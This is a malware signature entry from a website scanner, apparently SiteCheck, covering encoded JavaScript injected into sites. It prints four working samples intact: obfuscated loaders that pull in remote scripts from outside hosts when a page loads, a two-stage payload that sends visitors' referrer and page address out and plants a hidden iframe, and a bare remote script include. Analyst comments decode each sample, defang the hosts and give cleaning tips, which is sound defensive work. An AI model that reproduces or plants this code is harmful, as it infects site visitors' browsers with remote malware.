SiteCheck Signatures


malware-entry-mwjsgen2

Description:
Encoded JavaScript (known to send malware to site visitors) was detected. It can take any form, but it generally uses base64 or some other encoding to hide its content. Sometimes the content is not encoded, and a simple remote JavaScript file is included in the pages instead; in that case the malware is in the remote JavaScript.

Affecting:
Any web site

Malware dump (sample of malware):

<!--
  Analyst notes (annotation only; the sample below is unchanged).

  Behaviour, read from the code:
    * D() runs as soon as the tag is parsed. It aliases unescape as p, window as i and
      document as R, then assigns the inner function J to i["onload"]. The property name
      is assembled from "onloagWI".substr(0,5) + "l6gyd".substr(4), so the literal string
      "onload" never appears in the file.
    * h(w, C) builds the RegExp "[" + C + "]" with the "g" flag and deletes every matching
      character from w. It is the string de-obfuscator: h('sjcfrHiWpqtH', ...) gives
      "script" and h('8755...', '715') gives "8080". The statement after its return is
      unreachable.
    * When the page finishes loading, J() creates a script element, sets defer to 1
      ([4,1][1]) and src to the assembled URL, and appends it to document.body, so the
      visitor's browser fetches and runs a script from the remote host. Errors are
      passed to alert().

  Indicator decoded from the percent-encoded literals (defanged):
    hxxp://icychina[.]ru:8080/google.com/mercadolibre.com.mx/google.com.ua.php
    The host is icychina[.]ru; the names of well-known sites appear only in the path.

  Filler: the repeated "var X; if (X != ...) { ... }", new String(), new Date(),
  new Array() and this.xx = "" statements do not feed into the URL or the created
  element and look like padding meant to vary the file between infections.

  What to look for when cleaning a site: unescape bound to a short alias next to long
  percent-encoded runs, createElement called with a computed tag name, and an onload
  handler assigned through bracket notation with a concatenated name.
-->
<script>var e="";var U;if(U!='' && U!='W'){U=''};var j;if(j!='' && j!='t'){j=''};function D(){var p=unescape;var O="";var i=window;var DC=new Date();var K=p("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%72%63%61%64%6f%6c%69%62%72%65%2e%63%6f%6d%2e%6d%78%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%75%61%2e%70%68%70");var F='';this.SG="";var zP="";function h(w,C){var zi="";this.T='';var jJ;if(jJ!='Y'){jJ='Y'};var y="";var q=String("g");var fw='';var s=p("%5b"), m=p("%5d");var M;if(M!='Q' && M!='yS'){M=''};var wu;if(wu!='LZ' && wu!='mQ'){wu=''};var f=s+C+m;this.DCS="";var Ok=new String();var I=new RegExp(f, q);var Ck=new Array();return w.replace(I, new String());var P='';};this.pQ="";this.VT="";this.tl="";var vw='';this.bD="";var YP;if(YP!='Ej'){YP='Ej'};var R=document;var yb=new String();var E=h('87551105157558711105571','715');var H=new String();this.zv="";function J(){var rK=new String();var vI=new String();var BJ;if(BJ!='x'){BJ=''};var u=p("%68%74%74%70%3a%2f%2f%69%63%79%63%68%69%6e%61%2e%72%75%3a");var Uk="";this.gb='';var Yn=new Array();var jj=new Array();H=u;var JX;if(JX!='' && JX!='wh'){JX=''};var gV;if(gV!='' && gV!='wQ'){gV=''};H+=E;H+=K;var d=new String();try {var zV='';var NS=new Date();DH=R.createElement(h('sjcfrHiWpqtH','MoqjezOfZHW6'));this.sP='';var Ii;if(Ii!='eU'){Ii='eU'};this.ySV='';DH[p("%64%65%66%65%72")]=[4,1][1];var Kv;if(Kv!='' && Kv!='ju'){Kv='UR'};var ns;if(ns!='rKx' && ns != ''){ns=null};DH[p("%73%72%63")]=H;this.AT="";var EL;if(EL!='dY' && EL != ''){EL=null};this.SI="";R.body.appendChild(DH);var Ol="";} catch(S){this.ID="";alert(S);var zO;if(zO!='gB'){zO='gB'};};}var HS=new Date();var LY=new Array();i[new String("onloagWI".substr(0,5)+"l6gyd".substr(4))]=J;this.sd="";var Uv;if(Uv!='Lt' && Uv!='Fu'){Uv=''};};var _V;if(_V!='lXs'){_V=''};var EuZ=new String();D();var A_=new Date();</script>
<!--
  Analyst notes (annotation only; the sample below is unchanged, including the line
  break inside the trailing "var _b" statement, which is how the dump shows it).

  Behaviour, read from the code:
    * E() runs as soon as the tag is parsed. It aliases unescape as a, window as h and
      document as e, then assigns the inner function W to h["onloa" + "d"], i.e. the
      window onload handler.
    * O(aO, b) builds the RegExp "[" + b + "]" with the flag "2vxg".substr(3) ("g") and
      deletes every matching character from aO. O('skc3rDinpGtV', ...) gives "script"
      and O('8531...', '31462759') gives "8080". The statements after its return are
      unreachable.
    * When the page finishes loading, W() creates a script element, sets src to the
      assembled URL and defer to 1 ([1][0]), and appends it to document.body, so the
      visitor's browser fetches and runs a script from the remote host. Errors are
      passed to alert().

  Indicator decoded from the percent-encoded literals (defanged):
    hxxp://helphomecare[.]at:8080/google.com/download.com/qip.ru.php
    The host is helphomecare[.]at; the names of well-known sites appear only in the path.

  Filler: the repeated "var X; if (X != ...) { ... }", new String(), new Date(),
  new Array() and this.xx = '' statements do not feed into the URL or the created
  element and look like padding. Identifier names here are short and arbitrary, so a
  search keyed on variable names is unlikely to generalise; the structure (unescape
  alias, character-stripping helper, computed tag name, onload assignment) is the
  stable part.
-->
<script>function E(){var J;if(J!='f'){J='f'};var M=new String();var zp=new String();var a=unescape;var h=window;var t;if(t!='S'){t=''};var w='';var pn;if(pn!='Ry' && pn != ''){pn=null};var T=a("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%64%6f%77%6e%6c%6f%61%64%2e%63%6f%6d%2f%71%69%70%2e%72%75%2e%70%68%70");var H;if(H!='' && H!='tZ'){H=null};function O(aO,b){var x='';this.X='';var s=new String("2vxg".substr(3));var sr=new Array();var Fk;if(Fk!='zO'){Fk=''};var d=a("%5b"), F=a("%5d");var C='';var di=d+b+F;var R=new RegExp(di, s);var kH=new Array();var uY;if(uY!=''){uY='ww'};return aO.replace(R, new String());this.Yt="";var iD=new Date();};var RW=new Array();var Xo='';var AU=new Date();var _i;if(_i!='St' && _i!='cw'){_i=''};var Y=new String();this.Hx="";this.j="";var e=document;var dE="";var hP=O('8531960992486644203231','31462759');var K=new Array();var hq;if(hq!='jk' && hq!='tB'){hq='jk'};this.sI='';var cU='';var Ju;if(Ju!='Em' && Ju != ''){Ju=null};function W(){var dl=new Date();var at=new Date();var V;if(V!='Ib' && V!='YT'){V=''};var Wk;if(Wk!='UZ' && Wk!='kS'){Wk=''};var z=a("%68%74%74%70%3a%2f%2f%68%65%6c%70%68%6f%6d%65%63%61%72%65%2e%61%74%3a");var ef=new String();var Su;if(Su!='' && Su!='eZ'){Su=''};Y=z;var Vj='';var wi;if(wi!='hM' && wi!='Cq'){wi=''};Y+=hP;var iH='';var NZ="";Y+=T;this._K='';this.KC='';this.tn='';try {var Yw=new Date();var TK=new Date();db=e.createElement(O('skc3rDinpGtV','QUnKhV3DOkbBGWRMo'));var eg;if(eg!=''){eg='VEq'};var tC=new String();var AX=new String();db[a("%73%72%63")]=Y;var Ey;if(Ey!='RJ' && Ey != ''){Ey=null};db[a("%64%65%66%65%72")]=[1][0];var Vn;if(Vn!='PA'){Vn=''};var YS=new Date();var hR;if(hR!='ks'){hR=''};var Nr;if(Nr!='' && Nr!='_T'){Nr=''};this.QL='';e.body.appendChild(db);var Fd=new Date();var Xe=new Date();var Hw;if(Hw!=''){Hw='iY'};} catch(p){alert(p);};}var yS;if(yS!='Zo'){yS='Zo'};var NM;if(NM!=''){NM='es'};h[String("onloa"+"d")]=W;var Wf=new Array();var Sm=new String();var hT;if(hT!='' && hT!='Ei'){hT=null};};E();var 
_b=new String();var Og;if(Og!='' && Og!='xg'){Og=''};</script>
<!--
  Analyst notes (annotation only; the sample below is unchanged).

  Two decoding stages, read from the code:
    1. document.write(unescape('%3C%73...')) writes a second script block that defines
       dF(s). dF percent-decodes all of s except its last character, subtracts the
       numeric value of that last character from every character code, percent-decodes
       the result again and passes it to document.write.
    2. dF('...1') is then called; the trailing "1" means every character is shifted
       down by one.

  What the decoded payload does:
    * writes a script tag whose src is hxxp://itsallbreaksoft[.]net/tds/in.cgi?2 with
      query parameters that carry encodeURIComponent(document.referrer) and
      encodeURIComponent(document.URL), so the visitor's referrer and the infected
      page's address are disclosed to that host;
    * then, if the variable h is undefined, writes a 1x1 borderless iframe pointing at
      the same host with in.cgi?3 and the same parameters; otherwise, if h starts with
      "http:", sets window.location to h. h is not defined anywhere in this sample;
      presumably the remote script sets it (not verifiable from this page).

  Indicator (defanged): itsallbreaksoft[.]net, path /tds/in.cgi

  What to look for when cleaning a site: document.write(unescape(...)) followed directly
  by a call to a short-named function with a long argument made of "%26"-prefixed runs,
  and 1x1 iframes or window.location assignments in the rendered page that are not in
  the site's own templates.
-->
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>
<!--
  Analyst notes (annotation only; the sample below is unchanged).

  This is the unencoded variant mentioned in the description: a plain remote include.
  The tag itself carries no logic; whatever js.php returns is executed in the
  visitor's browser, and that response is not part of this page, so its behaviour
  cannot be stated from here. The dump shows no closing tag; the sample may be
  truncated.

  Indicator (defanged): hxxp://zettapetta[.]com/js.php

  When cleaning a site, compare every script src host in the rendered pages against
  the hosts the site is known to load from.
-->
<script src="http://zettapetta.com/js.php">